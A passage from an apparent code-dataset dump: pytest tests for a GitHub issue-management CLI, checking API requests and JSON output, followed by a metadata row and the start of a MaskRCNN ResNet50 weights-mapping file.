Point3D(object):\\r\\n    x = attr.ib()\\r\\n    y = attr.ib()\\r\\n    z = attr.ib()\\r\\n```\\r\\n\\r\\nExample taken from [this blog post extolling the virtues of `attrs`](https://glyph.twistedmatrix.com/2016/08/attrs.html) written by the author of [Twisted](https://twistedmatrix.com/trac/).\\r\\n\\r\\n## What's the difference between this Python project and similar ones?\\r\\n\\r\\nThe only other project like this that I'm aware of is [`characteristic`](https://github.com/hynek/characteristic), which the author abandoned to create `attrs` instead.\\r\\n\\r\\n--\\r\\n\\r\\nAnyone who agrees with this pull request could vote for it by adding a :+1: to it, and usually, the maintainer will merge it when votes reach **20**.",
"closed_at": null,
"closed_by": null,
"comments": 2,
"created_at": "2017-04-15T23:59:11Z",
"html_url": "https://github.com/vinta/awesome-python/pull/875",
"id": 221980315,
"labels": [],
"locked": false,
"milestone": null,
"number": 875,
"reactions": {
"+1": 10
},
"state": "open",
"title": "Add attrs",
"updated_at": "2017-05-20T23:16:50Z",
"url": "https://api.github.com/repos/vinta/awesome-python/issues/875",
"user": "jwodder"
}
]
'''
# Expected `issue comments` / `pr comments` JSON dump for jwodder/ghutil#1,
# which has exactly one comment.
ISSUE_COMMENTS = '''\
[
{
"body": "I do not currently have any plans for supporting plugins, and any such plans would be very far down on my to-do list for this project.\\n",
"created_at": "2017-06-29T16:31:32Z",
"html_url": "https://github.com/jwodder/ghutil/issues/1#issuecomment-312021247",
"id": 312021247,
"reactions": {},
"updated_at": "2017-06-29T16:31:32Z",
"url": "https://api.github.com/repos/jwodder/ghutil/issues/comments/312021247",
"user": "jwodder"
}
]
'''
def test_issue_comments_issue(cmd):
    """`issue comments` dumps an issue's comments as JSON."""
    result = cmd("issue", "comments", "ghutil/1")
    assert result.exit_code == 0
    assert result.output == ISSUE_COMMENTS
def test_pr_comments_issue(cmd):
    """`pr comments` produces the same dump for a plain issue."""
    result = cmd("pr", "comments", "ghutil/1")
    assert result.exit_code == 0
    assert result.output == ISSUE_COMMENTS
def test_issue_open(cmd):
    """`issue open` reopens every listed issue silently; each ends up open."""
    targets = ['jwodder/test/1', 'test/2']
    result = cmd('issue', 'open', *targets)
    assert result.exit_code == 0
    assert result.output == ''
    for target in targets:
        shown = cmd('issue', 'show', '-v', target)
        assert shown.exit_code == 0
        assert json.loads(shown.output)[0]["state"] == "open"
def test_issue_close(cmd):
    """`issue close` closes every listed issue silently; each ends up closed."""
    targets = ['jwodder/test/1', 'test/2']
    result = cmd('issue', 'close', *targets)
    assert result.exit_code == 0
    assert result.output == ''
    for target in targets:
        shown = cmd('issue', 'show', '-v', target)
        assert shown.exit_code == 0
        assert json.loads(shown.output)[0]["state"] == "closed"
def test_issue_lock(cmd):
    """`issue lock` locks every listed issue silently; each reports locked."""
    targets = ['jwodder/test/1', 'test/2']
    result = cmd('issue', 'lock', *targets)
    assert result.exit_code == 0
    assert result.output == ''
    for target in targets:
        shown = cmd('issue', 'show', '-v', target)
        assert shown.exit_code == 0
        assert json.loads(shown.output)[0]["locked"]
def test_issue_unlock(cmd):
    """`issue unlock` unlocks every listed issue silently; none stay locked."""
    targets = ['jwodder/test/1', 'test/2']
    result = cmd('issue', 'unlock', *targets)
    assert result.exit_code == 0
    assert result.output == ''
    for target in targets:
        shown = cmd('issue', 'show', '-v', target)
        assert shown.exit_code == 0
        assert not json.loads(shown.output)[0]["locked"]
def test_issue_edit_one_assignee(cmd):
    """--assignee replaces the assignee list via a single PATCH."""
    result = cmd(
        "--debug", "issue", "edit", "--assignee", "jwodder", "jwodder/test/1"
    )
    assert result.exit_code == 0
    expected = '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"assignees": [
"jwodder"
]
}
'''
    assert result.output == expected
def test_issue_edit_nil_assignee(cmd):
    """An empty --assignee value clears the assignee list."""
    result = cmd("--debug", "issue", "edit", "--assignee", "", "jwodder/test/1")
    assert result.exit_code == 0
    expected = '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"assignees": []
}
'''
    assert result.output == expected
def test_issue_edit_one_label(cmd):
    """--label replaces the label list via a single PATCH."""
    result = cmd("--debug", "issue", "edit", "--label", "invalid", "jwodder/test/1")
    assert result.exit_code == 0
    expected = '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"labels": [
"invalid"
]
}
'''
    assert result.output == expected
def test_issue_edit_nil_label(cmd):
    """An empty --label value clears the label list."""
    result = cmd("--debug", "issue", "edit", "--label", "", "jwodder/test/1")
    assert result.exit_code == 0
    expected = '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"labels": []
}
'''
    assert result.output == expected
def test_issue_edit_two_labels(cmd):
    """Repeated --label options (long and short form) are sent in order."""
    result = cmd(
        "--debug", "issue", "edit",
        "--label", "invalid", "-lhelp wanted", "jwodder/test/1",
    )
    assert result.exit_code == 0
    expected = '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"labels": [
"invalid",
"help wanted"
]
}
'''
    assert result.output == expected
def test_issue_edit_milestone(cmd):
    """A milestone given by name is resolved to its number via an extra GET."""
    result = cmd("--debug", "issue", "edit", "--milestone", "v1.0", "jwodder/test/1")
    assert result.exit_code == 0
    expected = '''\
GET https://api.github.com/repos/jwodder/test/issues/1
GET https://api.github.com/repos/jwodder/test/milestones?state=all
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"milestone": 1
}
'''
    assert result.output == expected
def test_issue_edit_int_milestone(cmd):
    """A milestone given by URL needs no lookup — the number is parsed out."""
    result = cmd(
        "--debug",
        "issue", "edit",
        "--milestone", "https://github.com/jwodder/test/milestone/1",
        "jwodder/test/1",
    )
    assert result.exit_code == 0
    expected = '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"milestone": 1
}
'''
    assert result.output == expected
def test_issue_edit_nil_milestone(cmd):
    """An empty --milestone value clears the milestone (PATCHes null)."""
    result = cmd("--debug", "issue", "edit", "--milestone", "", "jwodder/test/1")
    assert result.exit_code == 0
    expected = '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"milestone": null
}
'''
    assert result.output == expected
def test_issue_edit_title(cmd):
    """--title PATCHes just the title field."""
    result = cmd("--debug", "issue", "edit", "--title", "API test site", "jwodder/test/1")
    assert result.exit_code == 0
    expected = '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"title": "API test site"
}
'''
    assert result.output == expected
def test_issue_edit_nil_title(cmd):
    """An empty --title is still PATCHed, and the server's 422 validation
    error is surfaced as a failure with the error body printed."""
    result = cmd("--debug", "issue", "edit", "--title", "", "jwodder/test/1")
    assert result.exit_code != 0
    expected = '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"title": ""
}
422 Client Error: Unprocessable Entity for URL: https://api.github.com/repos/jwodder/test/issues/1
{
"documentation_url": "https://developer.github.com/v3/issues/#edit-an-issue",
"errors": [
{
"code": "missing_field",
"field": "title",
"resource": "Issue"
}
],
"message": "Validation Failed"
}
'''
    assert result.output == expected
def test_issue_edit_body(cmd):
    """--body takes a filename and PATCHes the file's contents verbatim
    (here the `life.py` fixture, JSON-escaped in the debug dump)."""
    r = cmd('--debug', 'issue', 'edit', '--body', str(FILEDIR/'life.py'), 'jwodder/test/1')
    assert r.exit_code == 0
    assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"body": "from collections import Counter\\n\\ndef life(before):\\n    \\\"\\\"\\\"\\n    Takes as input a state of Conway's Game of Life, represented as an iterable\\n    of ``(int, int)`` pairs giving the coordinates of living cells, and returns\\n    a `set` of ``(int, int)`` pairs representing the next state\\n    \\\"\\\"\\\"\\n    before = set(before)\\n    neighbors = Counter(\\n        (x+i, y+j) for (x,y) in before\\n                   for i in [-1,0,1]\\n                   for j in [-1,0,1]\\n                   if (i,j) != (0,0)\\n    )\\n    return {xy for (xy, n) in neighbors.items()\\n               if n == 3 or (n == 2 and xy in before)}\\n"
}
'''
def test_issue_edit_body_devnull(cmd):
    """--body pointed at os.devnull sets the body to an empty string."""
    result = cmd("--debug", "issue", "edit", "--body", os.devnull, "jwodder/test/1")
    assert result.exit_code == 0
    expected = '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"body": ""
}
'''
    assert result.output == expected
def test_issue_edit_open(cmd):
    """--open PATCHes state to "open"."""
    result = cmd("--debug", "issue", "edit", "--open", "jwodder/test/1")
    assert result.exit_code == 0
    expected = '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"state": "open"
}
'''
    assert result.output == expected
def test_issue_edit_closed(cmd):
    """--closed PATCHes state to "closed"."""
    result = cmd("--debug", "issue", "edit", "--closed", "jwodder/test/1")
    assert result.exit_code == 0
    expected = '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"state": "closed"
}
'''
    assert result.output == expected
def test_issue_edit_open_close(cmd):
    """When both --open and --close are given, the later option wins."""
    result = cmd("--debug", "issue", "edit", "--open", "--close", "jwodder/test/1")
    assert result.exit_code == 0
    expected = '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"state": "closed"
}
'''
    assert result.output == expected
# Editor buffer that `issue edit` presents for jwodder/test/1 before any
# changes are made (headers, blank separator line, then the body).
ISSUE_EDIT_MSG = (
    "Title: Test issue\n"
    "Labels: \n"
    "Assignees: \n"
    "Milestone: \n"
    "Open: yes\n"
    "\n"
    "Here be testing.\n"
)
def test_issue_edit_nosave(cmd, mocker):
    """Quitting the editor without saving aborts the edit: no PATCH is sent."""
    mocker.patch("click.edit", return_value=None)
    result = cmd("--debug", "issue", "edit", "jwodder/test/1")
    assert result.exit_code == 0
    assert result.output == (
        "GET https://api.github.com/repos/jwodder/test/issues/1\n"
        "GET https://api.github.com/repos/jwodder/test\n"
        "No modifications made; exiting\n"
    )
    click.edit.assert_called_once_with(ISSUE_EDIT_MSG, require_save=True)
def test_issue_edit_nochange(cmd, mocker):
    """Saving the buffer unmodified is treated the same as not saving."""
    mocker.patch("click.edit", return_value=ISSUE_EDIT_MSG)
    result = cmd("--debug", "issue", "edit", "jwodder/test/1")
    assert result.exit_code == 0
    assert result.output == (
        "GET https://api.github.com/repos/jwodder/test/issues/1\n"
        "GET https://api.github.com/repos/jwodder/test\n"
        "No modifications made; exiting\n"
    )
    click.edit.assert_called_once_with(ISSUE_EDIT_MSG, require_save=True)
def test_issue_edit_change_everything(cmd, mocker):
    """Saving an edit buffer with every field changed PATCHes all of them.

    The mocked editor returns a buffer with new title, labels, assignees,
    milestone, state, and body; the milestone name is resolved to its
    number via an extra GET of the repository's milestones.
    """
    mocker.patch(
        'click.edit',
        return_value='Title: Tests at work\n'
                     'Labels: help wanted, enhancement\n'
                     'Assignees: jwodder\n'
                     'Milestone: v1.0\n'
                     'Open: false\n'
                     '\n'
                     'Once upon a time, there was a little unit test.'
                     ' He failed, and the project was cancelled before anyone'
                     ' could figure out why.'
                     ' The end.\n'
    )
    r = cmd('--debug', 'issue', 'edit', 'jwodder/test/1')
    assert r.exit_code == 0
    assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
GET https://api.github.com/repos/jwodder/test
GET https://api.github.com/repos/jwodder/test/milestones?state=all
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"assignees": [
"jwodder"
],
"body": "Once upon a time, there was a little unit test. He failed, and the project was cancelled before anyone could figure out why. The end.\\n",
"labels": [
"help wanted",
"enhancement"
],
"milestone": 1,
"state": "closed",
"title": "Tests at work"
}
'''
    click.edit.assert_called_once_with(ISSUE_EDIT_MSG, require_save=True)
def test_issue_label_add(cmd):
    """Plain `issue label` POSTs new labels, keeping the existing ones."""
    def current_labels():
        shown = cmd("issue", "show", "jwodder/test/1")
        assert shown.exit_code == 0
        return sorted(json.loads(shown.output)[0]["labels"])

    assert current_labels() == ["enhancement"]
    result = cmd("--debug", "issue", "label", "jwodder/test/1", "invalid", "question")
    assert result.exit_code == 0
    expected = '''\
POST https://api.github.com/repos/jwodder/test/issues/1/labels
[
"invalid",
"question"
]
'''
    assert result.output == expected
    assert current_labels() == ["enhancement", "invalid", "question"]
def test_issue_label_add_redundant(cmd):
    """Re-adding an already-present label is harmless; only new ones appear."""
    def current_labels():
        shown = cmd("issue", "show", "jwodder/test/1")
        assert shown.exit_code == 0
        return sorted(json.loads(shown.output)[0]["labels"])

    assert current_labels() == ["enhancement", "invalid", "question"]
    result = cmd("--debug", "issue", "label", "jwodder/test/1", "invalid", "wontfix")
    assert result.exit_code == 0
    expected = '''\
POST https://api.github.com/repos/jwodder/test/issues/1/labels
[
"invalid",
"wontfix"
]
'''
    assert result.output == expected
    assert current_labels() == ["enhancement", "invalid", "question", "wontfix"]
def test_issue_label_add_nothing(cmd):
    """`issue label` with no labels POSTs an empty list and changes nothing."""
    def current_labels():
        shown = cmd("issue", "show", "jwodder/test/1")
        assert shown.exit_code == 0
        return sorted(json.loads(shown.output)[0]["labels"])

    assert current_labels() == ["enhancement", "question"]
    result = cmd("--debug", "issue", "label", "jwodder/test/1")
    assert result.exit_code == 0
    expected = '''\
POST https://api.github.com/repos/jwodder/test/issues/1/labels
[]
'''
    assert result.output == expected
    assert current_labels() == ["enhancement", "question"]
def test_issue_label_delete(cmd):
    """--delete removes each named label with its own DELETE request."""
    def current_labels():
        shown = cmd("issue", "show", "jwodder/test/1")
        assert shown.exit_code == 0
        return sorted(json.loads(shown.output)[0]["labels"])

    assert current_labels() == ["enhancement", "invalid", "question", "wontfix"]
    result = cmd(
        "--debug", "issue", "label", "--delete", "jwodder/test/1",
        "invalid", "wontfix",
    )
    assert result.exit_code == 0
    expected = '''\
DELETE https://api.github.com/repos/jwodder/test/issues/1/labels/invalid
DELETE https://api.github.com/repos/jwodder/test/issues/1/labels/wontfix
'''
    assert result.output == expected
    assert current_labels() == ["enhancement", "question"]
def test_issue_label_delete_nothing(cmd):
    """--delete with no labels makes no requests and changes nothing."""
    def current_labels():
        shown = cmd("issue", "show", "jwodder/test/1")
        assert shown.exit_code == 0
        return sorted(json.loads(shown.output)[0]["labels"])

    assert current_labels() == ["enhancement", "question"]
    result = cmd("--debug", "issue", "label", "--delete", "jwodder/test/1")
    assert result.exit_code == 0
    assert result.output == ""
    assert current_labels() == ["enhancement", "question"]
def test_issue_label_set(cmd):
    """--set PUTs the given labels, replacing the issue's label list."""
    def current_labels():
        shown = cmd("issue", "show", "jwodder/test/1")
        assert shown.exit_code == 0
        return sorted(json.loads(shown.output)[0]["labels"])

    assert current_labels() == ["enhancement", "question"]
    result = cmd(
        "--debug", "issue", "label", "--set", "jwodder/test/1",
        "invalid", "enhancement",
    )
    assert result.exit_code == 0
    expected = '''\
PUT https://api.github.com/repos/jwodder/test/issues/1/labels
[
"invalid",
"enhancement"
]
'''
    assert result.output == expected
    assert current_labels() == ["enhancement", "invalid"]
def test_issue_label_set_nothing(cmd):
    """--set with no labels PUTs an empty list, clearing all labels."""
    def current_labels():
        shown = cmd("issue", "show", "jwodder/test/1")
        assert shown.exit_code == 0
        return sorted(json.loads(shown.output)[0]["labels"])

    assert current_labels() == ["enhancement", "invalid"]
    result = cmd("--debug", "issue", "label", "--set", "jwodder/test/1")
    assert result.exit_code == 0
    expected = '''\
PUT https://api.github.com/repos/jwodder/test/issues/1/labels
[]
'''
    assert result.output == expected
    assert current_labels() == []
def test_issue_label_delete_set_nothing(nullcmd):
    """Giving both --delete and --set is rejected as a usage error."""
    result = nullcmd(
        "issue", "label", "--delete", "--set", "jwodder/test/1", "bug",
        standalone_mode=False,
    )
    assert result.exit_code != 0
    assert isinstance(result.exception, click.UsageError)
    assert str(result.exception) == '--delete and --set are mutually exclusive'
@pytest.mark.usefixtures('test_repo')
def test_issue_new(cmd):
    """`issue new` with -T and --body POSTs the issue and echoes both the
    request payload and the API's response.

    NOTE(review): no repository argument is given — presumably inferred
    from the `test_repo` fixture's working directory; the exact ids and
    timestamps show the HTTP layer is canned/recorded. Confirm in conftest.
    """
    r = cmd(
        '--debug',
        'issue', 'new',
        '-TThing is broken',
        '--body', str(FILEDIR/'lorem.txt'),
    )
    assert r.exit_code == 0
    assert r.output == '''\
POST https://api.github.com/repos/jwodder/test/issues
{
"assignees": [],
"body": "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\\n",
"labels": [],
"title": "Thing is broken"
}
{
"assignees": [],
"body": "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\\n",
"closed_at": null,
"closed_by": null,
"comments": 0,
"created_at": "2018-09-25T15:16:57Z",
"html_url": "https://github.com/jwodder/test/issues/1",
"id": 363631533,
"labels": [],
"locked": false,
"milestone": null,
"number": 1,
"reactions": {},
"state": "open",
"title": "Thing is broken",
"updated_at": "2018-09-25T15:16:57Z",
"url": "https://api.github.com/repos/jwodder/test/issues/1",
"user": "jwodder"
}
'''
@pytest.mark.usefixtures('test_repo')
def test_issue_new_edit_body(cmd, mocker):
    """`issue new` without --body opens an editor (mocked here) pre-filled
    with the header template, and uses the buffer's body text for the POST.

    The extra leading GET (relative to test_issue_new) fetches the repo
    before the editor is invoked.
    """
    HEADERS = 'Title: Thing is broken\n' \
              'Labels: \n' \
              'Assignees: \n' \
              'Milestone: \n'
    mocker.patch('click.edit', return_value=HEADERS + '\n' + LOREM)
    r = cmd('--debug', 'issue', 'new', '-TThing is broken')
    assert r.exit_code == 0
    assert r.output == '''\
GET https://api.github.com/repos/jwodder/test
POST https://api.github.com/repos/jwodder/test/issues
{
"assignees": [],
"body": "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\\n",
"labels": [],
"title": "Thing is broken"
}
{
"assignees": [],
"body": "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\\n",
"closed_at": null,
"closed_by": null,
"comments": 0,
"created_at": "2018-09-25T15:16:57Z",
"html_url": "https://github.com/jwodder/test/issues/1",
"id": 363631533,
"labels": [],
"locked": false,
"milestone": null,
"number": 1,
"reactions": {},
"state": "open",
"title": "Thing is broken",
"updated_at": "2018-09-25T15:16:57Z",
"url": "https://api.github.com/repos/jwodder/test/issues/1",
"user": "jwodder"
}
'''
    click.edit.assert_called_once_with(HEADERS+'\n', require_save=True)
@pytest.mark.usefixtures('test_repo')
def test_issue_new_edit_title(cmd, mocker):
    # Body given via --body but no title: the editor opens pre-filled with
    # empty headers plus the body text, and the (mocked) editor supplies the
    # title.
    HEADERS = 'Title: Thing is broken\n' \
              'Labels: \n' \
              'Assignees: \n' \
              'Milestone: \n'
    mocker.patch('click.edit', return_value=HEADERS + '\n' + LOREM)
    r = cmd('--debug', 'issue', 'new', '--body', str(FILEDIR/'lorem.txt'))
    assert r.exit_code == 0
    # --debug echoes the repo lookup, the POST payload, and the API response.
    assert r.output == '''\
GET https://api.github.com/repos/jwodder/test
POST https://api.github.com/repos/jwodder/test/issues
{
"assignees": [],
"body": "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\\n",
"labels": [],
"title": "Thing is broken"
}
{
"assignees": [],
"body": "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\\n",
"closed_at": null,
"closed_by": null,
"comments": 0,
"created_at": "2018-09-25T15:16:57Z",
"html_url": "https://github.com/jwodder/test/issues/1",
"id": 363631533,
"labels": [],
"locked": false,
"milestone": null,
"number": 1,
"reactions": {},
"state": "open",
"title": "Thing is broken",
"updated_at": "2018-09-25T15:16:57Z",
"url": "https://api.github.com/repos/jwodder/test/issues/1",
"user": "jwodder"
}
'''
    # The editor template must have had an empty Title header and the file's
    # body text appended after the blank separator line.
    click.edit.assert_called_once_with(
        'Title: \nLabels: \nAssignees: \nMilestone: \n\n' + LOREM,
        require_save=True,
    )
@pytest.mark.usefixtures('test_repo')
def test_issue_new_edit_title_no_body(cmd, mocker):
    # Neither title nor body given: the editor opens with the empty template,
    # and the (mocked) editor supplies only a title.  The POST payload must
    # then omit the "body" key entirely.
    EDIT = 'Title: \nLabels: \nAssignees: \nMilestone: \n\n'
    mocker.patch('click.edit', return_value='Title: Thing is broken\n')
    r = cmd('--debug', 'issue', 'new')
    assert r.exit_code == 0
    # --debug echoes the repo lookup, the POST payload, and the API response.
    assert r.output == '''\
GET https://api.github.com/repos/jwodder/test
POST https://api.github.com/repos/jwodder/test/issues
{
"assignees": [],
"labels": [],
"title": "Thing is broken"
}
{
"assignees": [],
"body": null,
"closed_at": null,
"closed_by": null,
"comments": 0,
"created_at": "2018-09-25T15:16:57Z",
"html_url": "https://github.com/jwodder/test/issues/2",
"id": 363631539,
"labels": [],
"locked": false,
"milestone": null,
"number": 2,
"reactions": {},
"state": "open",
"title": "Thing is broken",
"updated_at": "2018-09-25T15:16:57Z",
"url": "https://api.github.com/repos/jwodder/test/issues/2",
"user": "jwodder"
}
'''
    # The editor must have been invoked once with the blank header template.
    click.edit.assert_called_once_with(EDIT, require_save=True)
@pytest.mark.usefixtures('test_repo')
def test_issue_new_no_title_no_body(cmd, mocker):
    """Saving the editor template unchanged (empty title) aborts creation."""
    template = 'Title: \nLabels: \nAssignees: \nMilestone: \n\n'
    # The mocked editor hands back the template untouched, i.e. no title.
    mocker.patch('click.edit', return_value=template)
    result = cmd('--debug', 'issue', 'new')
    assert result.exit_code == 0
    expected = (
        'GET https://api.github.com/repos/jwodder/test\n'
        'Aborting issue due to empty title\n'
    )
    assert result.output == expected
    click.edit.assert_called_once_with(template, require_save=True)
@pytest.mark.usefixtures('test_repo')
def test_issue_new_no_name_no_body_no_save(cmd, mocker):
    """Quitting the editor without saving exits without creating an issue."""
    template = 'Title: \nLabels: \nAssignees: \nMilestone: \n\n'
    # click.edit returns None when the user exits without saving.
    mocker.patch('click.edit', return_value=None)
    result = cmd('--debug', 'issue', 'new')
    assert result.exit_code == 0
    expected = (
        'GET https://api.github.com/repos/jwodder/test\n'
        'No changes saved; exiting\n'
    )
    assert result.output == expected
    click.edit.assert_called_once_with(template, require_save=True)
def test_issue_assign(cmd):
    """`issue assign` POSTs the given users to the issue's assignees endpoint."""
    result = cmd('--debug', 'issue', 'assign', 'jwodder/test/1', 'jwodder')
    assert result.exit_code == 0
    # Debug mode echoes the request method, URL, and JSON payload.
    expected = '''\
POST https://api.github.com/repos/jwodder/test/issues/1/assignees
{
"assignees": [
"jwodder"
]
}
'''
    assert result.output == expected
def test_issue_assign_delete(cmd):
    """`issue assign -d` removes assignees via DELETE on the same endpoint."""
    result = cmd('--debug', 'issue', 'assign', '-d', 'jwodder/test/1', 'jwodder')
    assert result.exit_code == 0
    # Debug mode echoes the request method, URL, and JSON payload.
    expected = '''\
DELETE https://api.github.com/repos/jwodder/test/issues/1/assignees
{
"assignees": [
"jwodder"
]
}
'''
    assert result.output == expected
def test_issue_assign_set(cmd):
    """`issue assign --set` replaces the assignee list via PATCH on the issue."""
    result = cmd('--debug', 'issue', 'assign', '--set', 'jwodder/test/1', 'jwodder')
    assert result.exit_code == 0
    # --set PATCHes the issue itself instead of touching /assignees.
    expected = '''\
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"assignees": [
"jwodder"
]
}
'''
    assert result.output == expected
def test_issue_assign_delete_set(nullcmd):
    """Giving both -d and --set to `issue assign` must be rejected."""
    result = nullcmd(
        'issue', 'assign', '-d', '--set', 'jwodder/test/1', 'jwodder',
        standalone_mode=False,
    )
    # The command must fail with a UsageError naming the conflicting options.
    assert result.exit_code != 0
    assert isinstance(result.exception, click.UsageError)
    assert str(result.exception) == '--delete and --set are mutually exclusive'
def test_issue_web_issue(cmd, mocker):
    """`issue web` resolves the issue via the API and opens its HTML page."""
    mocker.patch('webbrowser.open_new')
    result = cmd('--debug', 'issue', 'web', 'ghutil/1')
    assert result.exit_code == 0, result.output
    # 'ghutil/1' omits the owner, so the authenticated user is looked up first.
    expected = '''\
GET https://api.github.com/user
GET https://api.github.com/repos/jwodder/ghutil/issues/1
'''
    assert result.output == expected
    webbrowser.open_new.assert_called_once_with(
        'https://github.com/jwodder/ghutil/issues/1'
    )
# issue new
# - milestones
# - editor invoked and you don't have push permission
# - explicit repository on command line
# issue edit - two assignees
# creating/editing an issue on a repository you don't have push access to
# issue search
# issue assign: no assignees given
| 37.96788 | 1,870 | 0.637697 | 5,110 | 35,462 | 4.343053 | 0.123483 | 0.038481 | 0.035191 | 0.047988 | 0.811517 | 0.761366 | 0.73753 | 0.711756 | 0.691299 | 0.666562 | 0 | 0.03029 | 0.194715 | 35,462 | 933 | 1,871 | 38.008574 | 0.746822 | 0.007247 | 0 | 0.550948 | 0 | 0.047393 | 0.671497 | 0.030344 | 0 | 0 | 0 | 0 | 0.18128 | 1 | 0.062796 | false | 0 | 0.009479 | 0 | 0.072275 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f1d83562fa7fbf68ca05b326335d51706d5b1ecf | 43,645 | py | Python | DeepLearningExamples/TensorFlow2/Segmentation/MaskRCNN/mrcnn_tf2/runtime/weights_mapping.py | puririshi98/benchmark | 79f554f1e1cf36f62994c78e0e6e5b360f554022 | [
"BSD-3-Clause"
] | null | null | null | DeepLearningExamples/TensorFlow2/Segmentation/MaskRCNN/mrcnn_tf2/runtime/weights_mapping.py | puririshi98/benchmark | 79f554f1e1cf36f62994c78e0e6e5b360f554022 | [
"BSD-3-Clause"
] | null | null | null | DeepLearningExamples/TensorFlow2/Segmentation/MaskRCNN/mrcnn_tf2/runtime/weights_mapping.py | puririshi98/benchmark | 79f554f1e1cf36f62994c78e0e6e5b360f554022 | [
"BSD-3-Clause"
] | null | null | null | """ Custom mapping that maps model backbone to weights from NVIDIA ResNet50 v1.5 checkpoint. """
# pylint: disable=line-too-long
WEIGHTS_MAPPING = {
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_1/batch_normalization_2/beta': 'resnet50/btlnck_block_0_0/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_1/batch_normalization_2/gamma': 'resnet50/btlnck_block_0_0/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_1/batch_normalization_2/moving_mean': 'resnet50/btlnck_block_0_0/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_1/batch_normalization_2/moving_variance': 'resnet50/btlnck_block_0_0/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_1/conv2d_2/kernel': 'resnet50/btlnck_block_0_0/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_2/batch_normalization_3/beta': 'resnet50/btlnck_block_0_0/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_2/batch_normalization_3/gamma': 'resnet50/btlnck_block_0_0/bottleneck_2/BatchNorm/gamma',
